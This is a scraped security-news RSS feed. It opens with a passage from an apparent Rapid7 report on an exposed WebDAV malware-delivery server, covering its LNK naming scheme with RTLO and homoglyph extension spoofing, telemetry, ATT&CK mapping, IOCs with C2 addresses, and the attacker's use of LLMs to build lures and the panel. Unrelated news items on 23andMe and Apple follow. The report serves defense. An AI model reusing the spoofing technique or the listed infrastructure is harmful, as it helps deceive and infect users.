Deception Techniques

**Location:** `C:\Users\Administrator\Desktop\LNK-Full-Matrix-Test`  
**Total files:** 60  
**Generated:** 2026-05-30

---

## Overview / Обзор

This folder contains a complete test matrix of **60 LNK shortcut files** combining all available WebDAV open methods with all LNK Deception Techniques supported by the Web-renamer project.

В этой папке находится полная тестовая матрица из **60 LNK-ярлыков**, объединяющих все доступные WebDAV-методы открытия со всеми техниками обмана LNK, поддерживаемыми проектом Web-renamer.

---

## Naming Scheme / Схема именования

All files follow the pattern:  
Все файлы следуют шаблону:

```
HyperPackSetup.&lt;method&gt;.&lt;trick&gt;.&lt;spoof&gt;.lnk
```

- **`HyperPackSetup`** — base filename / базовое имя файла
- **`&lt;method&gt;`** — WebDAV open method (e.g. `curl-http-temp-run`, `direct`, `cmd-start`) / метод открытия WebDAV
- **`&lt;trick&gt;`** — LNK deception technique (`standard`, `SPOOFEXE_HIDEARGS_DISABLETARGET`, etc.) / техника обмана LNK
- **`&lt;spoof&gt;`** — RTLO + homoglyph extension spoof (`‮ƒｄᴘ`) — visually appears as `.pdf` / спуф расширения через RTLO + гомоглифы — визуально выглядит как `.pdf`
- **`.lnk`** — real extension / реальное расширение

&gt; The spoof is applied **only to the extension** at the end, so the method and trick names remain clearly readable.  
&gt; Спуф применяется **только к расширению** в конце имени, поэтому названия методов и техник остаются читаемыми.
...</pre><p><span><em>Figure 11: This is a snippet from another </em></span><span><span data-type="inlineCode"><em>README.md</em></span></span><span><em>. The full README is available on Rapid7 Labs' </em></span><a href="https://github.com/rapid7/Rapid7-Labs/tree/main/IOCs/Simba%20Panel" target="_blank"><span><em>Github</em></span></a><span><em>. The text is original, and the translation to Russian was not added by us.</em></span></p><h3>OPSEC is hard </h3><p><span>As we mentioned previously, one of the artifacts we found in the open directory was a presentation file documenting a WebDAV delivery/admin panel called “Simba Service.”</span></p><p><em></em></p><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blte7a569d4a484149e/6a5e199e1abad5303f7de1ad/simba-service-presentation.png" alt="simba-service-presentation.png" caption="Figure 12: Simba service presentation." class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="simba-service-presentation.png" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blte7a569d4a484149e/6a5e199e1abad5303f7de1ad/simba-service-presentation.png" data-sys-asset-uid="blte7a569d4a484149e" data-sys-asset-filename="simba-service-presentation.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 12: Simba service presentation." data-sys-asset-alt="simba-service-presentation.png" data-sys-asset-position="none" sys-style-type="display"><figcaption>Figure 12: Simba service presentation.</figcaption></div></figure><p>⠀</p><p><span>The panel was built to manage a read-only WebDAV file share and track delivery activity in real time, including file opens, visitor IPs, geolocation, Windows versions, traffic, errors, folder-level conversion, and access events.</span></p><p><span>The actor not only used the same server for testing and staging files, but also recklessly left behind internal documentation for the backend used to manage and track delivery. The presentation reads like an internal build document, walking through the architecture, tech stack, API endpoints, authentication, logging, analytics, bug fixes, deployment setup, and panel access flow. It also included the panel IP and port, along with credentials.</span></p><p><span>Additionally, the file also looked like it was generated with an LLM. Its structured project overview, emoji-heavy sections, API-documentation format, and implementation details stood out. Basically, in some subfolders you can find LLM-generated READMEs with lures and malicious executables, while in another subfolder there is an admin panel with a hardcoded IP, port, and credentials.</span></p><p><span>We are intentionally withholding live access details, credentials, IP addresses, ports, and panel locations.</span></p><h3>Delivery panel overview</h3><p><span>The attacker appeared to have deployed the panel as-is, without changing the default password or port. The panel included several operator-facing sections: Review, Folders, Files, Visitors, Geography, Traffic/Server, Notes, File Manager, Users, Link Builder, Safety, and Documentation.</span></p><p><em></em></p><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt20dc8a76cc4cdc10/6a5e1a005e34b09034dfd8cd/simba-service-page-with-blocking-capabilities_.png" alt="simba-service-page-with-blocking-capabilities_.png" caption="Figure 13: Simba service page with blocking capabilities." class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="simba-service-page-with-blocking-capabilities_.png" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt20dc8a76cc4cdc10/6a5e1a005e34b09034dfd8cd/simba-service-page-with-blocking-capabilities_.png" data-sys-asset-uid="blt20dc8a76cc4cdc10" data-sys-asset-filename="simba-service-page-with-blocking-capabilities_.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 13: Simba service page with blocking capabilities." data-sys-asset-alt="simba-service-page-with-blocking-capabilities_.png" data-sys-asset-position="none" sys-style-type="display"><figcaption>Figure 13: Simba service page with blocking capabilities.</figcaption></div></figure><p>⠀</p><p><span>The portal was capable of detecting scanners and bots by analyzing behavioral indicators, including requests for non-existent resources, HTTP 404 responses, WebDAV probes, and directory enumeration attempts. Based on these observations, it assigned a risk score to each IP address and allowed the operator to manually block flagged hosts. Portal records indicate that the blocking configuration was modified at least 3 times during the campaign (June 5, June 10, and June 20).</span></p><p><span>We analyzed telemetry from the WebDAV delivery service over an approximately 5.5-day window (June 20–26, 2026 UTC), which recorded 77,098 requests from 3,892 unique client IPs across 101 countries, with roughly 45.9 GB transferred.</span></p><p><span>The activity was short-lived and high-volume, peaking between June 21 and June 24 before dropping sharply. Based on this data we can assume that it was a targeted delivery campaign.</span></p><p><span>Most of the launch activity came from one specific lure: a CURP-themed fake PDF report under the </span><span><span data-type="inlineCode">/Downloads/CURP/ReportFinal.rcs.pdf</span></span><span> (RTLO-spoofed </span><span><span data-type="inlineCode">.scr</span></span><span> executable.) Out of 2,441 observed executable launch events, 2,384, or approximately 97.7%, were tied to this lure. It accounted for approximately 14.6 GB of traffic and was accessed by 1,869 unique client IPs.</span></p><p><span>The WebDAV traffic was heavily concentrated in Mexico. Mexico generated 63,622 requests, representing 82.5% of all traffic, and 2,365 launch events, or approximately 96.9% of all observed launches. The next largest sources of traffic, including the United States and Germany, produced far fewer launch events and appeared more consistent with scanning, research, or automated retrieval.</span></p><p><em></em></p><table><colgroup data-width="1250"><col><col><col><col><col></colgroup><tbody><tr><td><p><span><strong>Country</strong></span></p></td><td><p><span><strong>Requests</strong></span></p></td><td><p><span><strong>Share of requests</strong></span></p></td><td><p><span><strong>Unique client IPs</strong></span></p></td><td><p><span><strong>Launch events</strong></span></p></td></tr><tr><td><p><span>Mexico</span></p></td><td><p><span>63,622</span></p></td><td><p><span>82.5%</span></p></td><td><p><span>2,698</span></p></td><td><p><span>2,365</span></p></td></tr><tr><td><p><span>United States</span></p></td><td><p><span>4,032</span></p></td><td><p><span>5.2%</span></p></td><td><p><span>463</span></p></td><td><p><span>47</span></p></td></tr><tr><td><p><span>Germany</span></p></td><td><p><span>2,751</span></p></td><td><p><span>3.6%</span></p></td><td><p><span>59</span></p></td><td><p><span>1</span></p></td></tr><tr><td><p><span>United Kingdom</span></p></td><td><p><span>645</span></p></td><td><p><span>0.8%</span></p></td><td><p><span>40</span></p></td><td><p><span>0</span></p></td></tr><tr><td><p><span>Netherlands</span></p></td><td><p><span>532</span></p></td><td><p><span>0.7%</span></p></td><td><p><span>49</span></p></td><td><p><span>1</span></p></td></tr><tr><td><p><span>France</span></p></td><td><p><span>407</span></p></td><td><p><span>0.5%</span></p></td><td><p><span>21</span></p></td><td><p><span>0</span></p></td></tr><tr><td><p><span>Finland</span></p></td><td><p><span>401</span></p></td><td><p><span>0.5%</span></p></td><td><p><span>6</span></p></td><td><p><span>10</span></p></td></tr><tr><td><p><span>Brazil</span></p></td><td><p><span>343</span></p></td><td><p><span>0.4%</span></p></td><td><p><span>41</span></p></td><td><p><span>0</span></p></td></tr><tr><td><p><span>Republic of Korea</span></p></td><td><p><span>312</span></p></td><td><p><span>0.4%</span></p></td><td><p><span>16</span></p></td><td><p><span>1</span></p></td></tr></tbody></table><p><span><em>Table 3: Geographic distribution of WebDAV delivery activity.</em></span></p><p><span><em></em></span></p><p><span>Mexico was not only the largest source of traffic, but also the source of nearly all observed launch activity. Within Mexico, the activity was geographically broad, spanning hundreds of cities rather than clustering around a single locality. The top five Mexican cities accounted for approximately 27.4% of Mexican launch events, with Mexico City alone accounting for approximately 15.7%.</span></p><p><span>Hourly requests to the WebDAV delivery service also supported the assessment that much of the traffic came from real user interaction rather than only automated internet scanners. Traffic peaked between 16:00 and 19:00 UTC, which corresponds to working hours in central Mexico.</span></p><p><span>By launch events, we mean cases where the WebDAV panel showed that a client opened or requested an executable file in a way that looked like an attempted run, such as a </span><span><span data-type="inlineCode">GET</span></span><span> request for an </span><span><span data-type="inlineCode">.scr</span></span><span> or </span><span><span data-type="inlineCode">.exe</span></span><span> file from the delivery share. This does not mean we confirmed malware execution on the endpoint. It means the delivery infrastructure saw the file being accessed or invoked.</span></p><h2>Protocol behavior</h2><p><span>The HTTP methods and status codes show how clients interacted with the WebDAV delivery service. </span><span><span data-type="inlineCode">PROPFIND</span></span><span> requests and </span><span><span data-type="inlineCode">207</span></span><span> responses indicate directory browsing, which is typical when Windows Explorer accesses a remote WebDAV location. </span><span><span data-type="inlineCode">GET</span></span><span> requests and </span><span><span data-type="inlineCode">200</span></span><span> responses show file retrieval, including executable files opened or requested from the share.</span></p><p><span></span></p><table><colgroup data-width="500"><col><col></colgroup><tbody><tr><td><p><span><strong>Method</strong></span></p></td><td><p><span><strong>Count</strong></span></p></td></tr><tr><td><p><span>PROPFIND</span></p></td><td><p><span>57,287</span></p></td></tr><tr><td><p><span>GET</span></p></td><td><p><span>13,088</span></p></td></tr><tr><td><p><span>OPTIONS</span></p></td><td><p><span>6,597</span></p></td></tr><tr><td><p><span>PROPPATCH</span></p></td><td><p><span>125</span></p></td></tr><tr><td><p><span>LOCK</span></p></td><td><p><span>1</span></p></td></tr></tbody></table><p><span><em>Table 4: HTTP methods observed in WebDAV delivery traffic.</em></span></p><p><span><em></em></span></p><table><colgroup data-width="500"><col><col></colgroup><tbody><tr><td><p><span><strong>Status</strong></span></p></td><td><p><span><strong>Count</strong></span></p></td></tr><tr><td><p><span>207</span></p></td><td><p><span>57,412</span></p></td></tr><tr><td><p><span>200</span></p></td><td><p><span>19,532</span></p></td></tr><tr><td><p><span>206</span></p></td><td><p><span>154</span></p></td></tr></tbody></table><p><span><em>Table 5: HTTP status codes observed in WebDAV delivery traffic.</em></span></p><h2><span>MITRE ATT&amp;CK techniques</span></h2><table><colgroup data-width="1010"><col><col><col></colgroup><tbody><tr><td><p><span><strong>Name</strong></span></p></td><td><p><span><strong>MITRE ATT&amp;CK technique</strong></span></p></td><td><p><span><strong>Code</strong></span></p></td></tr><tr><td><p><span>Payload execution</span></p></td><td><p><span>User Execution: Malicious File</span></p></td><td><p><span>T1204.002</span></p></td></tr><tr><td><p><span>Masquerading</span></p></td><td><p><span>Right-to-Left Override</span></p></td><td><p><span>T1036.002</span></p></td></tr><tr><td><p><span>Masquerading</span></p></td><td><p><span>Double File Extension</span></p></td><td><p><span>T1036.007</span></p></td></tr><tr><td><p><span>DLL sideloading</span></p></td><td><p><span>Hijack Execution Flow: DLL</span></p></td><td><p><span>T1574.001</span></p></td></tr><tr><td><p><span>Obfuscation</span></p></td><td><p><span>Encrypted/Encoded File</span></p></td><td><p><span>T1027.013</span></p></td></tr><tr><td><p><span>Payload unpacking</span></p></td><td><p><span>Deobfuscate/Decode Files or Information</span></p></td><td><p><span>T1140</span></p></td></tr><tr><td><p><span>Payload carrier</span></p></td><td><p><span>Steganography / image-carried payload data</span></p></td><td><p><span>T1027.003</span></p></td></tr><tr><td><p><span>API hiding</span></p></td><td><p><span>Dynamic API Resolution</span></p></td><td><p><span>T1027.007</span></p></td></tr><tr><td><p><span>In-memory loading</span></p></td><td><p><span>Reflective Code Loading</span></p></td><td><p><span>T1620</span></p></td></tr><tr><td><p><span>Injection</span></p></td><td><p><span>Process Hollowing</span></p></td><td><p><span>T1055.012</span></p></td></tr><tr><td><p><span>Native API use</span></p></td><td><p><span>Native API</span></p></td><td><p><span>T1106</span></p></td></tr><tr><td><p><span>Sandbox evasion</span></p></td><td><p><span>Time Based Evasion</span></p></td><td><p><span>T1497.003</span></p></td></tr><tr><td><p><span>Anti-analysis</span></p></td><td><p><span>Debugger / instrumentation checks</span></p></td><td><p><span>T1622</span></p></td></tr><tr><td><p><span>UAC bypass</span></p></td><td><p><span>Bypass User Account Control</span></p></td><td><p><span>T1548.002</span></p></td></tr><tr><td><p><span>Persistence</span></p></td><td><p><span>Registry Run Keys / Startup Folder</span></p></td><td><p><span>T1547.001</span></p></td></tr><tr><td><p><span>Persistence</span></p></td><td><p><span>Scheduled Task</span></p></td><td><p><span>T1053.005</span></p></td></tr><tr><td><p><span>Collection</span></p></td><td><p><span>Keylogging</span></p></td><td><p><span>T1056.001</span></p></td></tr><tr><td><p><span>Collection</span></p></td><td><p><span>Screen Capture</span></p></td><td><p><span>T1113</span></p></td></tr><tr><td><p><span>Collection</span></p></td><td><p><span>Clipboard Data</span></p></td><td><p><span>T1115</span></p></td></tr><tr><td><p><span>Credential access</span></p></td><td><p><span>Credentials from Web Browsers</span></p></td><td><p><span>T1555.003</span></p></td></tr><tr><td><p><span>Credential access</span></p></td><td><p><span>Steal Web Session Cookie</span></p></td><td><p><span>T1539</span></p></td></tr><tr><td><p><span>Collection</span></p></td><td><p><span>Data from Local System</span></p></td><td><p><span>T1005</span></p></td></tr><tr><td><p><span>Collection</span></p></td><td><p><span>Automated Collection</span></p></td><td><p><span>T1119</span></p></td></tr><tr><td><p><span>Staging</span></p></td><td><p><span>Archive Collected Data: Archive via Utility</span></p></td><td><p><span>T1560.001</span></p></td></tr><tr><td><p><span>C2</span></p></td><td><p><span>Encrypted Channel</span></p></td><td><p><span>T1573</span></p></td></tr><tr><td><p><span>Exfiltration</span></p></td><td><p><span>Exfiltration Over C2 Channel</span></p></td><td><p><span>T1041</span></p></td></tr><tr><td><p><span>Possible persistence</span></p></td><td><p><span>WMI Event Subscription</span></p></td><td><p><span>T1546.003</span></p></td></tr><tr><td><p><span>Phishing lure generation</span></p></td><td><p><span>Generate Phishing Lures</span></p></td><td><p><span>AML.T0052</span></p></td></tr><tr><td><p><span>Resource Development</span></p></td><td><p><span>Resource Development</span></p></td><td><p><span>AML.TA0003</span></p></td></tr><tr><td><p><span>Obtain capabilities via LLM tooling</span></p></td><td><p><span>Obtain Capabilities</span></p></td><td><p><span>AML.T0016</span></p></td></tr><tr><td><p><span>LLM-assisted capability development</span></p></td><td><p><span>Develop Capabilities</span></p></td><td><p><span> AML.T0017</span></p></td></tr><tr><td><p><span>LLM prompt crafting for attack documentation</span></p></td><td><p><span>LLM Prompt Crafting</span></p></td><td><p><span>AML.T0065</span></p></td></tr><tr><td><p><span>Obtain capabilities via tooling</span></p></td><td><p><span>Obtain Capabilities: Software Tools</span></p></td><td><p><span>AML.T0016.001</span></p></td></tr></tbody></table><h2><span>Indicators of compromise (IOCs)</span></h2><h3>CURP campaign</h3><p>Phishing page: hxxps://gobf[.]mx </p><p>WebDav server: onedrive[.]cv</p><p></p><p>ReportFinal.&lt;RLO&gt;.scr    SHA256 04A8018191F2E9E76072D072A933371D9D669A42DE2B2A087541CD3A653B0BA7</p><p></p><p>C2: 77.110.127.205 ports 56001-56003 / 57666 / 57777 / 57888</p><p>Domain: google.services[.]ug</p><p>Campaign tag:06x12x2026SantaEbash2  (v4.4.3)</p><p>Schedule tasks: brokerhost, net_queue_32</p><p></p><p>Staging paths:</p><p>%TEMP%\is-XXXXX.tmp\Fo-Binary.exe </p><p>%AppData%\Roaming\inttracer_i686_prod\      </p><p> C:\ProgramData\inttracer_i686_prod\</p><h3>DlrtyGames campaign </h3><p>C2: 23[.]94[.]252[.]228:57666</p><p>JA3: fc54e0d16d9764783542f0146a98b300</p><p>DlrtyGames.exe</p><p>SHA256: e8be17a7fbef48b45f1e958b3ae5ebdfcad58808969982c431a905eefcae5268</p><p>discord-rpc.x64.dll</p><p>SHA256: 449d1121fa275879af22a20407aa7253ac750ac8fa7ff5691101752600d645df</p><p>profiler16.dll</p><p>SHA256: a88f5ee748e60f889d046718bfe3ddcf1c5f3cba2001cad587e8953a76bf7aa9</p><p>loader-pool.db</p><p>SHA256: 51a02eccdcae0483c7cbb9796738eee6c2a13b740d30e5417cda09bf418ea93b</p><p>.NET RAT</p><p>SHA256: 82e67735cf822db8f2f759e742e5bf8c54fdbd01a4170619b9e0916e1b3f5923</p><p>Staging paths:</p><p>C:\ProgramData\basenet\</p><p>%APPDATA%\basenet\</p><p>Persistence:</p><p>HKCU\Software\Microsoft\Windows\CurrentVersion\Run\XNNNMHJAZNCNHGIKJDW</p><p>\com_app_bg_i686</p><p>\messenger_component_v8_32_rc</p><p></p><p>More indicators of compromise can be found on Rapid7’s <a href="https://github.com/rapid7/Rapid7-Labs/tree/main/IOCs/Simba%20Panel" target="_blank">GitHub</a>.</p><h2>Rapid7 customers</h2><p>Customers using Rapid7’s Intelligence Hub gain direct access to all IOCs from this campaign, including any future indicators as they are identified.</p><h2>Conclusion</h2><p><span>The operator’s OPSEC failed in the best way possible for defenders. Thanks to a completely exposed server, we managed to pull down their entire operational toolkit: staged payloads, lure templates, testing files, builder notes, and active campaign artifacts. This sloppiness effectively offered a rare, transparent view of their end-to-end delivery pipeline rather than just the final malware it served.</span></p><p><span>The real impact shows up in speed and scale. The actor generated lure variants in bulk, tested them systematically, documented results, and refined delivery techniques in short cycles. The artifacts also suggested that attackers used LLM for rapid lure generation and development since their cPanel was vibecoded. </span></p><p><span>While the fact that attackers are adopting genAI in their workflows is nothing new, looking past the novelty reveals a much more practical shift in adversary operations.</span></p><p><span>The takeaway isn’t that “AI wrote the malware.” It’s that the attacker used LLMs to operate more like a modern software product team. The use of genAI enables them to prototype, test, and scale their delivery pipeline at a fast pace.</span></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Don’t Mention the Children]]></title>
<description><![CDATA[Michael Rosen reads his poem Don’t Mention the Children Related: Genocide Hidden in Arkansas’ Cadron Settlement on Trail of Tears Thirty of the list’s 50 victims were children, hardly any with listed identities. The inscription explains that “before 1850, it was common for Cherokee children to be...]]></description>
<link>https://tsecurity.de/de/3679757/it-security-nachrichten/dont-mention-the-children/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3679757/it-security-nachrichten/dont-mention-the-children/</guid>
<pubDate>Sun, 19 Jul 2026 18:27:47 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Michael Rosen reads his poem Don’t Mention the Children Related: Genocide Hidden in Arkansas’ Cadron Settlement on Trail of Tears Thirty of the list’s 50 victims were children, hardly any with listed identities. The inscription explains that “before 1850, it was common for Cherokee children to be unnamed…”]]></content:encoded>
</item>
<item>
<title><![CDATA[23andMe Agrees to $18M Settlement With 43 States Over 2023 Data Breach]]></title>
<description><![CDATA[23andMe will pay $18 million to settle claims from 43 states over its 2023 data breach, which exposed genetic information tied to nearly 7 million people. The post 23andMe Agrees to $18M Settlement With 43 States Over 2023 Data Breach…
Read more →
The post 23andMe Agrees to $18M Settlement With 4...]]></description>
<link>https://tsecurity.de/de/3677170/it-security-nachrichten/23andme-agrees-to-18m-settlement-with-43-states-over-2023-data-breach/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3677170/it-security-nachrichten/23andme-agrees-to-18m-settlement-with-43-states-over-2023-data-breach/</guid>
<pubDate>Sat, 18 Jul 2026 00:37:32 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>23andMe will pay $18 million to settle claims from 43 states over its 2023 data breach, which exposed genetic information tied to nearly 7 million people. The post 23andMe Agrees to $18M Settlement With 43 States Over 2023 Data Breach…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/23andme-agrees-to-18m-settlement-with-43-states-over-2023-data-breach/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/23andme-agrees-to-18m-settlement-with-43-states-over-2023-data-breach/">23andMe Agrees to $18M Settlement With 43 States Over 2023 Data Breach</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[23andMe Agrees to $18M Settlement With 43 States Over 2023 Data Breach]]></title>
<description><![CDATA[23andMe will pay $18 million to settle claims from 43 states over its 2023 data breach, which exposed genetic information tied to nearly 7 million people.
The post 23andMe Agrees to $18M Settlement With 43 States Over 2023 Data Breach appeared first on TechRepublic.]]></description>
<link>https://tsecurity.de/de/3677123/it-nachrichten/23andme-agrees-to-18m-settlement-with-43-states-over-2023-data-breach/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3677123/it-nachrichten/23andme-agrees-to-18m-settlement-with-43-states-over-2023-data-breach/</guid>
<pubDate>Sat, 18 Jul 2026 00:17:36 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>23andMe will pay $18 million to settle claims from 43 states over its 2023 data breach, which exposed genetic information tied to nearly 7 million people.</p>
<p>The post <a href="https://www.techrepublic.com/article/news-23andme-18-million-settlement-2023-genetic-data-breach/">23andMe Agrees to $18M Settlement With 43 States Over 2023 Data Breach</a> appeared first on <a href="https://www.techrepublic.com/">TechRepublic</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple's long-running DOJ antitrust case may not make it to trial]]></title>
<description><![CDATA[Apple and the US Justice Department are reportedly in early discussions over the potential for an early settlement of a 2024 iPhone antitrust suit brought about by the Biden administration.Apple hasn't taken the antitrust case lying down. Image source: AppleWhile discussions are reportedly underw...]]></description>
<link>https://tsecurity.de/de/3676762/ios-mac-os/apples-long-running-doj-antitrust-case-may-not-make-it-to-trial/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3676762/ios-mac-os/apples-long-running-doj-antitrust-case-may-not-make-it-to-trial/</guid>
<pubDate>Fri, 17 Jul 2026 19:52:02 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple and the US Justice Department are reportedly in early discussions over the potential for an early settlement of a 2024 <a href="https://appleinsider.com/inside/iphone" title="iPhone" data-kpt="1">iPhone</a> antitrust suit brought about by the Biden administration.<br><br><div><img src="https://photos5.appleinsider.com/gallery/64546-134448-Apple-Park-night-xl.jpg" alt="Circular building with illuminated windows surrounded by trees at twilight, under a gradient sky of orange and blue. A colorful object is inside the open courtyard." height="738"><br><span>Apple hasn't taken the antitrust case lying down. Image source: Apple</span></div><br>While discussions are reportedly underway, it's unclear whether an agreement will be reached. However, the Trump administration has been working to settle lawsuits brought by the previous administration for some time. It's clear there is a willingness to do a deal from their side.<br><br>Apple is also keen. <em>Bloomberg</em> <a href="https://www.bloomberg.com/news/articles/2026-07-17/apple-in-early-settlement-talks-with-doj-over-antitrust-case?accessToken=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzb3VyY2UiOiJTdWJzY3JpYmVyR2lmdGVkQXJ0aWNsZSIsImlhdCI6MTc4NDMwNzM0NiwiZXhwIjoxNzg0OTEyMTQ2LCJhcnRpY2xlSWQiOiJUSUJRTzdUOU5KTFMwMCIsImJjb25uZWN0SWQiOiJDNEVEQ0FFMUZBMDU0MEJFQTI0QTlGMjExQzFFOTA4MCJ9.bMDdu17gg2nYwZAlFVuUynehI5maJLkPD1G25ykzKN4&amp;leadSource=article-gifting">reports</a> that Apple has already made multiple offers to the Justice Department in 2026 alone. The company previously lost a bid to dismiss the antitrust lawsuit in 2025.<br><br><br> <a href="https://appleinsider.com/articles/26/07/17/apples-long-running-doj-antitrust-case-may-not-make-it-to-trial?utm_source=rss">Continue Reading on AppleInsider</a> | <a href="https://forums.appleinsider.com/discussion/244985?urm_source=rss">Discuss on our Forums</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[23andMe Faces New Security Mandates in $18m Data Breach Settlement]]></title>
<description><![CDATA[23andMe has agreed to an $18m settlement with 42 US attorneys general over its 2023 data breach, including enhanced data protection requirements This article has been indexed from www.infosecurity-magazine.com Read the original article: 23andMe Faces New Security Mandates in $18m…
Read more →
The...]]></description>
<link>https://tsecurity.de/de/3676395/it-security-nachrichten/23andme-faces-new-security-mandates-in-18m-data-breach-settlement/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3676395/it-security-nachrichten/23andme-faces-new-security-mandates-in-18m-data-breach-settlement/</guid>
<pubDate>Fri, 17 Jul 2026 17:10:50 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>23andMe has agreed to an $18m settlement with 42 US attorneys general over its 2023 data breach, including enhanced data protection requirements This article has been indexed from www.infosecurity-magazine.com Read the original article: 23andMe Faces New Security Mandates in $18m…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/23andme-faces-new-security-mandates-in-18m-data-breach-settlement/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/23andme-faces-new-security-mandates-in-18m-data-breach-settlement/">23andMe Faces New Security Mandates in $18m Data Breach Settlement</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[23andMe Faces New Security Mandates in $18m Data Breach Settlement]]></title>
<description><![CDATA[23andMe has agreed to an $18m settlement with 42 US attorneys general over its 2023 data breach, including enhanced data protection requirements]]></description>
<link>https://tsecurity.de/de/3676343/it-security-nachrichten/23andme-faces-new-security-mandates-in-18m-data-breach-settlement/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3676343/it-security-nachrichten/23andme-faces-new-security-mandates-in-18m-data-breach-settlement/</guid>
<pubDate>Fri, 17 Jul 2026 16:38:45 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[23andMe has agreed to an $18m settlement with 42 US attorneys general over its 2023 data breach, including enhanced data protection requirements]]></content:encoded>
</item>
<item>
<title><![CDATA[23andMe agrees to a $18 million settlement over 2023 data breach]]></title>
<description><![CDATA[A bipartisan coalition of 43 attorneys general has secured an $18 million settlement with genetic testing company 23andMe over its failure to adequately protect customer data before the company's 2023 breach. The agreement also requires new cybersecurity and governance measures for the organizati...]]></description>
<link>https://tsecurity.de/de/3674008/it-security-nachrichten/23andme-agrees-to-a-18-million-settlement-over-2023-data-breach/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3674008/it-security-nachrichten/23andme-agrees-to-a-18-million-settlement-over-2023-data-breach/</guid>
<pubDate>Thu, 16 Jul 2026 17:39:30 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A bipartisan coalition of 43 attorneys general has secured an $18 million settlement with genetic testing company 23andMe over its failure to adequately protect customer data before the company's 2023 breach. The agreement also requires new cybersecurity and governance measures for the organization now responsible for managing the genetic information of millions of users. New …</p>
<p>The post <a href="https://cyberinsider.com/23andme-agrees-to-a-18-million-settlement-over-2023-data-breach/">23andMe agrees to a $18 million settlement over 2023 data breach</a> appeared first on <a href="https://cyberinsider.com/">CyberInsider</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[23andMe to pay $18 million in new genetics data breach settlement]]></title>
<description><![CDATA[Genetic testing company 23andMe has agreed to pay $18 million to settle claims from a coalition of 43 attorneys general that it failed to protect customers' genetic data. [...]]]></description>
<link>https://tsecurity.de/de/3673680/it-security-nachrichten/23andme-to-pay-18-million-in-new-genetics-data-breach-settlement/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3673680/it-security-nachrichten/23andme-to-pay-18-million-in-new-genetics-data-breach-settlement/</guid>
<pubDate>Thu, 16 Jul 2026 15:52:51 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Genetic testing company 23andMe has agreed to pay $18 million to settle claims from a coalition of 43 attorneys general that it failed to protect customers' genetic data. [...]]]></content:encoded>
</item>
<item>
<title><![CDATA[Google Play Opens the Door to Third-Party App Stores, Starting Next Week]]></title>
<description><![CDATA[As part of the antitrust settlement between Google and Epic Games, third-party app developers will have access to the Google Play Store beginning next week.]]></description>
<link>https://tsecurity.de/de/3672180/it-nachrichten/google-play-opens-the-door-to-third-party-app-stores-starting-next-week/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3672180/it-nachrichten/google-play-opens-the-door-to-third-party-app-stores-starting-next-week/</guid>
<pubDate>Thu, 16 Jul 2026 03:47:15 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[As part of the antitrust settlement between Google and Epic Games, third-party app developers will have access to the Google Play Store beginning next week.]]></content:encoded>
</item>
<item>
<title><![CDATA[Google and Epic Cancel Settlement; Third-Party App Stores Coming To Google Play]]></title>
<description><![CDATA[An anonymous reader quotes a report from Ars Technica: Big changes are coming to Android apps, but they're not the changes Google wanted. The settlement between Google and Epic that aimed to put to rest the companies' long-running antitrust battle is being withdrawn, and that means third-party ap...]]></description>
<link>https://tsecurity.de/de/3671690/it-security-nachrichten/google-and-epic-cancel-settlement-third-party-app-stores-coming-to-google-play/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671690/it-security-nachrichten/google-and-epic-cancel-settlement-third-party-app-stores-coming-to-google-play/</guid>
<pubDate>Wed, 15 Jul 2026 21:09:13 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
